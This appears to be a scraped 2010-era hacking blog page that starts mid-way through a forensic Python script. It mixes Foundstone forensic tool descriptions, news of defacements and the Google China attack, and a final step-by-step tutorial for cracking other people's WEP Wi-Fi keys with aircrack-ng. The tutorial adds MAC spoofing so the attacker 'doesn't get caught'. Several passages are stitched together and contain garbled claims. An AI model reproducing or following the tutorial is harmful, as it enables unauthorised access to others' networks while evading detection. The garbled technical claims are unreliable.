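            root,
            after=utc(2010, 1, 12),
            before=utc(2010, 1, 13, 12, 0),
            recurse=recurse,
        )
        return [
            (t.isoformat(), os.path.relpath(p, root).replace(os.sep, "/"))
            for t, p in hits
        ]


if __name__ == "__main__":
    for stamp, rel in demo():
        print(stamp, rel)
```

Run it against a mounted read-only image or a working copy rather than the live evidence volume; listing a directory can still update the directory's own access time on some filesystems.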

System Requirements

Windows NT 4.0 SP3
16MB Memory
Administrator privileges
Audit log enabled with searchable records
Set NT command line buffer to 500 or more lines. 1200 or more lines works well


SOURCE: http://www.foundstone.com

Download free Internet Explorer activity forensic analysis tool: PASCO

Many important files within Microsoft Windows have structures that are undocumented. One of the principles of computer forensics is that all analysis methodologies must be well documented and repeatable, and they must have an acceptable margin of error. Currently, there is a lack of open source methods and tools that forensic analysts can rely upon to examine the data found in proprietary Microsoft files.

Many computer crime investigations require the reconstruction of a subject's internet activity. Since this analysis technique is executed regularly, we researched the structure of the data found in Internet Explorer activity files (index.dat files). Pasco, the Latin word meaning "browse", was developed to examine the contents of Internet Explorer's cache files. The foundation of Pasco's examination methodology is presented in the white paper located here. Pasco will parse the information in an index.dat file and output the results in a field-delimited manner so that it may be imported into your favorite spreadsheet program. Pasco is built to work on multiple platforms and will execute on Windows (through Cygwin), Mac OS X, Linux, and *BSD platforms.

Usage: pasco [options]
-d Undelete Activity Records
-t Field Delimiter (TAB by default)

Example Usage:

[kjones:pasco/bin]% ./pasco index.dat > index.txt

Open index.txt as a TAB delimited file in MS Excel to further sort and filter your results:


SOURCE: http://www.foundstone.com

Download Free Tool to Find Ascii, Unicode and Resource strings in a file: BINTEXT

A small, very fast and powerful text extractor that will be of particular interest to programmers. It can extract text from any kind of file and includes the ability to find plain ASCII text, Unicode (double byte ANSI) text and Resource strings, providing useful information for each item in the optional "advanced" view mode. Its comprehensive filtering helps prevent unwanted text being listed. The gathered list can be searched and saved to a separate file as either a plain text file or in informative tabular format.

Useful tip: Place a shortcut to Bintext in your Windows\SendTo folder so that you can automatically send files to BinText by right-clicking on their names and choosing Send To -> BinText from the drop-down menu. You can set this up by right-clicking on bintext.exe, selecting Copy then open up your Windows\SendTo folder, right click the mouse and select Paste Shortcut.

** NOTE: Some Anti-virus packages may falsely report this product as a keylogger/trojan application. Please upgrade to the latest anti-virus definitions as this has been corrected by most vendors.**


SOURCE: http://www.foundstone.com

Dump Firefox AutoComplete files into XML Using DUMPAUTOCOMPLETE

This application will search for the default Firefox profile of the user who runs the tool and dump the AutoComplete cache in XML format to standard output. Alternatively, autocomplete files can be passed to the application and they will be parsed as well. This application understands mork based autocomplete files (Firefox 1.x) as well as SQLite based formhistory and webappsstore files (Firefox 2.x).

The download package contains a standalone Windows application. The MSVCR71.dll may be needed on systems that do not already have this file. The full Python source code is also included and can be run on Windows, Mac OS X, Linux, or any other system with Python installed (the additional "pysqlite2" module is required for SQLite based file parsing).

Usage: dumpAutoComplete [formhistory[.dat|.sqlite]]

Example Usage:

C:\Bin\> dumpAutoComplete > mydata.xml
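
The SQLite half of that workflow, as an added Python example (not the DumpAutoComplete source): it opens a form-history database read-only and writes its entries as XML. The moz_formhistory table and its column names are assumed from Firefox's formhistory.sqlite, the XML element and attribute names are this example's own, and the rows in build_sample_db() are constructed.

```python
import re
import sqlite3
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Characters XML 1.0 cannot carry; a form field can hold anything a user typed.
_XML_ILLEGAL = re.compile("[\x00-\x08\x0b\x0c\x0e-\x1f\ufffe\uffff]")

# Assumed column names; only those actually present in the file are emitted.
KNOWN_COLUMNS = ("fieldname", "value", "timesUsed", "firstUsed", "lastUsed")


def xml_safe(value):
    """Render illegal characters visibly instead of dropping them silently."""
    return _XML_ILLEGAL.sub(lambda m: "\\x%02x" % ord(m.group()), str(value))


def dump_formhistory(db_path):
    """Return the form-history entries of db_path as an XML string."""
    db_path = Path(db_path).resolve()
    # mode=ro: the evidence file is opened read-only and never written to.
    con = sqlite3.connect(db_path.as_uri() + "?mode=ro", uri=True)
    try:
        try:
            cur = con.execute("SELECT * FROM moz_formhistory ORDER BY rowid")
        except sqlite3.DatabaseError as exc:
            raise ValueError("no readable moz_formhistory table in %s"
                             % db_path.name) from exc
        present = [d[0] for d in cur.description]
        root = ET.Element("formhistory", source=db_path.name)
        for row in cur:
            record = dict(zip(present, row))
            entry = ET.SubElement(root, "entry")
            for col in KNOWN_COLUMNS:
                if record.get(col) is not None:
                    entry.set(col, xml_safe(record[col]))
        return ET.tostring(root, encoding="unicode")
    finally:
        con.close()


def build_sample_db(path):
    """Create a constructed form-history database for the demonstration."""
    rows = [  # constructed sample rows; timestamps are stored as found
        ("searchbar-history", "ntfs alternate data streams", 3,
         1263370000000000, 1263380000000000),
        ("email", "analyst@example.test", 1,
         1263371000000000, 1263371000000000),
        ("comment", "a<b & \x01c", 1, 1263372000000000, None),
    ]
    con = sqlite3.connect(str(path))
    con.execute(
        "CREATE TABLE moz_formhistory (id INTEGER PRIMARY KEY, fieldname TEXT,"
        " value TEXT, timesUsed INTEGER, firstUsed INTEGER, lastUsed INTEGER)"
    )
    con.executemany(
        "INSERT INTO moz_formhistory"
        " (fieldname, value, timesUsed, firstUsed, lastUsed)"
        " VALUES (?, ?, ?, ?, ?)",
        rows,
    )
    con.commit()
    con.close()


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        db = Path(tmp) / "formhistory.sqlite"
        build_sample_db(db)
        return dump_formhistory(db)


if __name__ == "__main__":
    print(demo())
```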


SOURCE: http://www.foundstone.com

A binary file byte-patching program: PATCHIT

A file byte-patching utility. This is driven by a simple scripting language. It can patch sequences of bytes in any file, search for byte patterns (with wildcards) and also extract and utilise DLL exported function addresses as source positions in files to be patched.

The total command list is as follows:
  • MESSAGE <"message"> Displays a message during script execution.
  • DIR <"directory path"> Optional directory path to search for files. For compatibility it is advisable not to use specific drive names in the path.
  • FILE <"filename"> [filesize] Filename to patch. Optional filesize specifies the size that the file must match to be accepted.
  • FIND [<*>]... Performs a search on the current file for the sequence of bytes that match ... up to max 256. Use the keyword * to match any byte. If a match is found then the PATCH file position value is set to the file position at which the found pattern begins.
  • FUNCTION <"funcname"> Sets the current patch position to the file position of the given exported function name (case sensitive). It is assumed that the file being patched is a DLL.
  • PATCH [[POS ] | [OFFSET ]] ... Patches the current file at optional file position/offset. Replaces orig_byte with new_byte. Fails if original byte read from file is not orig_byte.
  • COPY <"orig_file"> <"new_file"> Copies "orig_file" to "new_file"
  • DELETE <"filename"> Deletes the specified file.
  • INIFILE <"filename"> Specifies an INI file to be used in subsequent INI commands. This filename is relative to the last DIR directory path.
  • INISECTION <"section"> Specifies an INI section name for use in subsequent INIWRITE commands.
  • INIWRITE <"keyname"> <"value"> Writes the given string value to the INI keyname in the previously specified INI file's section.
It would be useful to write a program that performed the dual tasks of altering an application's behavior and at the same time kept a documented note of exactly what I had done to achieve the result in the form of the commented script file.


SOURCE: http://www.foundstone.com

Iranian Cyber Army hit Baidu, China’s Internet search engine: Chinese hack back

The users who visited Baidu's Web site were redirected to a page with black screen that had an image of a green flag, and the page read in English and Arabic, "This site has been hacked by the Iranian Cyber Army."

The outage, which lasted for three and hours, affected many users as Baidu is China’s largest search engine, offering more than 50 search and community services.

Jeremy Rossi, a partner in Praetorian Security Group, a New York City-based security consultancy, told Computer World that it is likely that the Iranian Cyber Army attacked Baidu by altering its Domain Name System (DNS) at the registrar level.

There is a possibility that the hackers undertook a phishing attack to obtain a username and password that allowed them to access the records of Baidu at the registrar level, asserted Rossi.

The same method was used to hack Twitter in December. The company has said that a Twitter account was used to modify its DNS records.

The Twitter attack had lasted for more than an hour. The users who logged in were redirected to a page with black screen that had an image of a green flag, and the page read in English and Arabic that the site had been hacked by Iranian Cyber Army, asserting that they had the power to control and manage Internet.

It is not clear why Baidu’s Web site has been attacked.

Twitter was hacked after the micro-blogging site was used by the pro-democracy forces in Iran earlier in summer to bring to light the country’s disputed presidential elections that were marred by a blood bath.

At that time, when the media had a difficult time covering the elections, the opposition took to Twitter to provide minute by minute update along with videos.

It is likely that the attack on Baidu is the result of severing bilateral ties between the two countries following elections in Iran last year.

Additionally, Chinese Web users have created "CN4Iran", a discussion forum on Twitter, commenting on the situation in Iran and supporting the pro-democracy forces.

The attack, though short-lived, infuriated Chinese Web users.

In retaliation, the hackers in China attacked Web sites registered in Iran, which appeared with Chinese flags and their slogans.

An Iranian Web site, room98.ir, displayed a message by the Honker Union for China, “This morning your Iranian Cyber Army intrusion [sic] our baidu.com.

“Please tell your so-called Iranian Cyber Army: Don't intrusion Chinese website about The United States authorities to intervene the internal affairs of Iran's response. This is a warning!”

The Honker Union for China also posted a slogan on their Website, “We are China's hacker! Let the world hear the voice of China! The state is higher than the dignity of all!"

The Honker Union for China is a group in China that is quite active in hacktivism. Its members combine hacking skills with patriotism and nationalism.

Over the years, they have launched a series of attacks on websites in the United States, mostly government-related sites.

SOURCE: The Money Times

Google Attacked – May Leave China

A highly targeted attack on Google China and 20 other high profile companies including Adobe Systems has led to a major controversy. The attack that hit Google in mid-December originated in China and was aimed at obtaining the email credentials of activists based in Europe, America and China who advocate human rights in China. The attack was discovered as Google uncovered similar attacks on at least 20 other companies in the financial, technology, media, and chemical industries. Adobe Systems issued a separate statement that reported it and other companies had also come under attack. In light of the revelations, Google said it is considering shuttering its Chinese operations altogether.
"These attacks and the surveillance they have uncovered - combined with the attempts over the past year to further limit free speech on the web - have led us to conclude that we should review the feasibility of our business operations in China," Google's chief legal officer David Drummond commented here. "We have decided we are no longer willing to continue censoring our results on Google.cn, and so over the next few weeks we will be discussing with the Chinese government the basis on which we could operate an unfiltered search engine within the law, if at all."
The attack resulted in a breach of 2 email accounts, and the company has stated that no major information except the date of account creation and the subject line was compromised, rather than the content of the emails themselves. The names of the 20 companies have also been omitted. Attacks that bind malware code to Adobe PDF readers and applications have been on the rise, and the timing of Google’s warning and Adobe's official statement has led to speculation that some of the attacks may have used Adobe applications or exploits. Google also mentioned in a separate blog post that servers of companies have not been targeted.
China is known for its tightly controlled internet policies, and Chinese hackers have recently gained notoriety along with Russian ones in the scene. With the rising attacks on major companies, let's see what steps the silicon giants take to counter it.

Update - Google has rolled out the option to use HTTPS access by default in Gmail due to the attack on Gmail accounts in China. One more step towards security. You can read more about it here

Via The Register


PS : Like this article? You can always support me by buying me a coffee or You can always try some of the cool merchandize from PROHACK.

POSTED BY XERO ALL RIGHTS RESERVED.


Wednesday, January 6, 2010

Learn How to Protect Your Smartphone From Hackers

Hackers are now targeting smartphones with programs to steal your valuable information. Here are some measures to protect yourself.
  • First, don't store sensitive information on your phone that can be accessed if it's lost or stolen.
  • Smartphones can get viruses, so protect yourself with software to keep them secure.
  • If you're using Wi-Fi in a public place, don't try to access your online bank accounts.
  • It is recommended not to 'jailbreak' the iPhone to use third party software. That move disrupts its security measures and leaves it vulnerable to attack.

Tuesday, January 5, 2010

Google Nexus One Launch – Google Jumps Mobile

Google will be announcing its own smartphone and will finally jump into mobile computing officially. The smartphone, named Nexus One, will showcase the latest generation of the Linux-based open source Android operating system and will be marketed directly by Google itself. Designed by HTC, it runs Android OS 2.1, which is a step up from the older version 2.0.
The Nexus One is powered by a 1-GHz Snapdragon CPU, with a 3.7-inch 480 x 800 display, a 5-megapixel camera with LED flash, 512 MB of RAM and an expandable 4-GB microSD card. The 1-GHz processor alone should make the Nexus One one of the fastest smartphones currently available, and it will face stiff competition from the product offerings of Apple iPhone, Nokia, Palm and Blackberry.
The phone will be priced at about
  • $530 unlocked and
  • $180 subsidized with a contract to commit for 2 years.
With Google jumping into the mobile market, the biggest loser is Microsoft, as HTC used to be its flagship company for its Windows Mobile phones, and now it's not. Overall, the Nexus has little to set itself up as a standard or benchmark in the market given the competitive offerings from other smartphone makers, unless Google baffles us with some nice welcoming tricks up its sleeve.


POSTED BY XERO ALL RIGHTS RESERVED. Google Blog.



Official Web site of Iran’s president, Ahmadinejad.ir, got hacked

Monday night in San Francisco, the official Web site of Iran’s president, Ahmadinejad.ir, had been attacked by hackers. Although the Web site appears to be down now, people trying to access it last night were redirected to this page, which contains the following message:

Dear God, In 2009 you took my favorite singer - Michael Jackson, my favorite actress - Farrah Fawcett, my favorite actor - Patrick Swayze, my favorite voice - Neda. Please, please, don’t forget my favorite politician - Ahmadinejad and my favorite dictator - Khamenei in the year 2010. Thank you.

The site was subsequently inaccessible, and speculated that it was “either intentionally pulled or … is simply being overloaded since so many people are looking to grab a peek at the hack.”

The apparent attack comes three weeks after a group calling itself the “Iranian Cyber Army” launched an attack that briefly redirected users of Twitter to a site that displayed a message that seemed to support Iran’s government. That message read, in part:

U.S.A. Think They Controlling And Managing Internet By Their Access, But They Don’t, We Control And Manage Internet By Our Power.

SOURCE: http://blog.austinheap.com

Spanish Prime Minister's Website Defaced

Visitors to the country’s official website were greeted by the slapstick character Mr Bean as the official website was defaced by malicious hackers. The representative for Spanish Prime Minister Jose Luis Rodriguez Zapatero confirmed the defacement of www.eu2010.es but insisted that the website was never compromised and was left untouched; therefore the act was more or less a stunt.

The act was done using a cross-site scripting attack, which injects custom unauthorized content into vulnerable websites. People who tried to visit the PM's site were briefly met by an image of Mr. Bean actor Rowan Atkinson. Comparisons between the appearance of Spain's leader and the buffoon have been a long-standing joke.

While the hack was relatively harmless, XSS, or cross-site scripting, holes can be exploited to inject malicious code into visitors' browsers that steals authentication credentials or redirects victims to malicious websites. Recently the frequency of XSS attacks has increased considerably and may pose a potential threat to major websites of the world.

POSTED BY XERO ALL RIGHTS RESERVED.

Thousands of income taxpayers received ‘fake’ emails from ‘phishers’ and ‘hackers’

Thousands of income taxpayers were flummoxed by ‘fake’ emails received from ‘phishers’ and ‘hackers’ on Monday seeking their personal and financial details ahead of refunds payment.

Fake mails also lead the taxpayers to links that are mirror images of the income tax (I-T) department’s website and seek sensitive information including bank accounts details, among other financial details. The mails in circulation are regarded by a huge section of I-Tax department as nothing but ‘spam mail’. But, others do see the vulnerability of the I-T department’s large database and its website that links crores of taxpayers, both individual and companies.
Gulshan Rai, director general, CERT-IN at the department of information technology, told Financial Chronicle, “Online security has been a huge concern for the industry. With the growth of websites, emails phishing and hacking has increased to a great extent. We do see a lot of spam emails being circulated for financial gains. We need to educate individuals on online security.”

These emails, which originate from a web address not related to the I-T department, have led to confusion and anxiety on the security of financial data uploaded by individuals and companies.

But the I-T department has clarified that links with fake mails under circulation only reflect the mirror image of the I-T department's website. The I-T department has maintained that neither the website nor its intra-net data has been either hacked or compromised. The I-T department has also said that it does not send emails on refunds and does not seek any information regarding credit cards of taxpayers. “To create mirror image of a website, there is no need to hack it. The I-T website has not been hacked. We have taken appropriate steps to prevent such incidents,” said Shishir Jha, IT commissioner and spokesperson, central board of direct taxes.

In October, the I-T department received several complaints from taxpayers about phishing. An additional commissioner of the I-T department, who did not wish to be identified, confirmed that the site was hacked in October 2009. Following the incident, the I-T department in a news release, said, “Information has been received from several quarters that people are receiving electronic mail informing them of their income-tax refunds and seeking their credit card details. The email is sent from the following or similar mailing addresses — lhxbkw@ accounts.net or cvhfvs@ accounts.net.”

The department cautioned taxpayers against giving out information on credit cards and accounts details online. Mails received by taxpayers on Monday also originated from similar addresses. Efforts made by FC to contact the director general (systems) at the I-Tax department were unsuccessful. Lakshmi Prasad, in-charge of systems at I-T department was not available for comment.

SOURCE: mydigitalfc

Monday, January 4, 2010

Vulnerabilities in Twitter and Google Calendar

A security researcher uncovered some holes in Google Calendar and Twitter that may allow an attacker to steal cookies and user session IDs.

A security researcher has uncovered vulnerabilities in Twitter and Google Calendar that could put users at risk.
In a proof of concept, researcher Nir Goldshlager demonstrated cross-site scripting (XSS) vulnerabilities in Google Calendar and Twitter that he said could be used to steal cookies and session IDs. He also uncovered an HTML injection issue affecting Google Calendar as well that he said could be used to redirect a victim to an attack site any time the user viewed his or her Google Calendar agenda events.

"We do not believe this report contains evidence of substantial security issues," a spokesperson for Google said. "Trying to trick someone into copying unfamiliar, suspicious code into a Google Calendar text field is neither a likely attack vector nor one that we are seeing being exploited. ... Nonetheless, we will check the input validation mechanisms in Google Calendar text fields to help prevent any abuse of this capability before an event is sanitized."

According to Goldshlager, a penetration testing expert with Avnet Information Security Consulting in Israel, the cross-site scripting vulnerability can be exploited if a victim adds malicious code to his quick add post calendar.

“When the victim … [adds] this malicious code, his cookies [and] session ID will be stolen and will be sent to the attacker site," he said. "Then the attacker will be able to get full control of the victim’s Google accounts like: Google Calendar account, Google Groups, iGoogle, etc.”
Goldshlager also demonstrated that the HTML injection vulnerability could be used to log a user out of his Google account, something the Google spokesman said “is of negligible security impact” and "can be avoided by not clicking on the link."

"They should fix this immediately because an attacker can redirect a victim to any site that he wants, and [with] the XSS issue an attacker can steal the victim's cookies and get full control of his accounts," the researcher said.

SOURCE: eWeek

Facebook and Twitter are easy targets for hackers and cybercriminals in 2010

Social networking sites such as Facebook and Twitter would become soft targets for cybercriminals to spoof in 2010.
In its 2010 Threat Predictions report, McAfee forecasts that Microsoft Operating systems have fallen prey to cyber attacks from hackers, but software and social networking sites are likely to be their new target. On the grounds that hackers want to get a sense of wielding far-reaching influence, they tend to be keen on breaking into universal operating systems and software. MS Office applications such as Adobe Flash and Acrobat Reader are expected to be the prey of malware writers. Except for Adobe, Mozilla's Firefox web browser and Apple's QuickTime are also likely to be threatened by cyber criminals.

The computer security company also expects that social networking sites such as Twitter and Facebook would become playgrounds for cybercriminals intent on disseminating malware, such as computer viruses and spyware. For Facebook, malware disguised as instant messages from friends and application programs will be the most common form of cyber attack.

David Marcus, McAfee Labs' director of security research and communications, said, "Users of social networking sites often click on messages from friends and their referrals without suspicion, a practice hackers gleefully take advantage of. On Facebook, when users download or open applications, they should take a second look at it, googling more information about them."

SOURCE: Korea IT Times

Hack Wifi using Backtrack


Wifi or Wireless Fidelity is the name of a popular wireless networking technology that uses radio waves to provide wireless high-speed Internet and network connections (as if you didn't know..). Wifi has become an integral part of our lives today. Wifi is secured using the WEP protocol, which intends to secure wireless LANs like wired LANs by encrypting data over radio waves; however, it has been found that WEP is not as secure as once believed. Now almost anyone can hack into a Wifi network by generating the valid WEP key using Backtrack. Read on to learn how ..

Disclaimer: This tutorial is given for educational purposes only and that for any misuse of this information, the blogger cannot be held liable.

SETTING UP THE CARD AND THE CONSOLE

Boot up Backtrack on your virtual machine/laptop and open up the command console and type the commands as they are given -

  • ifconfig

This is the Linux equivalent of ipconfig, you will see the network adaptors in your system. See which one is for Wi-Fi. A few examples are wlan0, wifi0, etc.

  • airmon-ng

This command will initialize the Wi-Fi network monitoring & will tell you how many networks are in range

  • airmon-ng stop [Wi-Fi Card name(without the quotes)]

This command will stop the cards broadcast and reception immediately

  • macchanger --mac [Desired MAC address] [Wi-Fi card name]

This command will change the current MAC address to any MAC address you desire, so that you don’t get caught later

  • airmon-ng start [Wi-Fi Card name]

You will see another extra adaptor that is set on monitor mode, use that adaptor for all further purposes in the following commands where – ‘[Wi-Fi card name]’ appears

DUMPING PACKETS

Once you have set up all the parameters, you need to sniff and dump data packets in order to get the key. You can do so by using the following commands. On the command console type these commands -

  • airodump-ng [Wi-Fi card name]

Copy and paste the BSSID in the following command and execute it

  • airodump-ng -c [Channel Number] -w [Desired Filename for later decryption] --bssid [BSSID] [Wi-Fi Card name]

As you execute the command, you will see a certain number of beacons and data packets that will be stored in the filename you have given. The file will be stored in the root of the system drive (click on Computer and you will see the file). The file will be present in two formats: *.cap, *.txt.

SPEEDING UP THINGS

However, packet dumping is quite a slow process; we need to speed things up to save time. Open a new console after the first data packet has been stored, type the following command in the new console and execute it

aireplay-ng -1 0 -a [BSSID] -h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)] [Wi-Fi card name]

As you type this command you will see that the data packets required for breaking the key will increase dramatically thereby saving you a lot of time.

REVEALING WEP KEY

Open another console once you have around 20,000 data packets and type the following command to reveal the WEP key.

aircrack-ng -n 64 -b [BSSID] [Filename without the extension]

As you type this command, you will see that a key will appear in front of you in the given below format:

XX:XX:XX:XX

It is not necessary that the key should have exactly the same digits as shown above so please don’t freak out if you see a 10 digit or 14 digit key. Also if the decryption fails, you can change the bit level of the decryption in the command:

aircrack-ng -n [BIT LEVEL] -b [BSSID] [Filename without extension]

Remember, the bit level should be a number of the form 2^n, where n = 1, 2, 3, 4…

e.g.

aircrack-ng -n 32 -b [BSSID] [Filename without the extension]

OR

aircrack-ng -n 128 -b [BSSID] [Filename without the extension] etc. etc.

Now just log in using the WEP key you got.

Cheers

POSTED BY XERO ALL RIGHTS RESERVED. ANONYMOUS AUTHOR.
